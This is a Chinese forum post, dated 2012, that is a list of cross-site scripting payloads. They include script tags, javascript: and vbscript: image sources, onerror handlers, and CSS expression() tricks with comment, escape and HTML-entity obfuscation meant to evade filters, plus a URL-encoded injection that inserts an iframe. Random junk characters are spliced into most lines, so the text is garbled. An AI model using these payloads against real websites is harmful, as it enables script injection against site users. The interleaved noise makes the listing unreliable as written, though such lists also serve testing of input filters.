<script>alert("跨站")</script> (最常用), h! ?& m) h: H2 d% {
<img scr=javascript:alert("跨站")></img>8 F4 i5 w( L$ K8 |
<img scr="javascript: alert(/跨站/)></img>5 i( T3 ?3 k$ e1 P; I
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)4 H$ x8 z" [8 s2 A+ k% u: d
<img scr="#" onerror=alert(/跨站/)></img>
5 u. B4 k# r0 K1 L8 m<img scr="#" style="xss:expression(alert(/xss/));"></img>7 \* H( X+ V* R2 v+ W9 A
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)6 c7 x* b& X3 b% ~. h
<img src=vbscript:msgbox ("xss")></img>
, W: q7 n' O I/ A+ Q9 Q( p<style> input {left:expression (alert('xss'))}</style>- e" T2 f9 }7 ^; n9 \; |& y
<div style={left:expression (alert('xss'))}></div>
; k0 U7 ?* R4 U0 a1 E<div style={left:exp/* */ression (alert('xss'))}></div>
4 |. R8 {. l$ s: w<div style={left:\0065\0078ression (alert('xss'))}></div>
; U1 ^( Q* i; p* U( R; Uhtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
6 n; t5 m+ m3 vunicode <div style="{left:expRessioN (alert('xss'))}">
% p. h# Q L2 o' b
# G" z+ K' d& {7 I" g) E7 R" x* j"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["# ~1 }; @9 I0 N( ~2 ?( u9 `
|
发表于 2012-9-15 14:09:13
收藏
支持
反对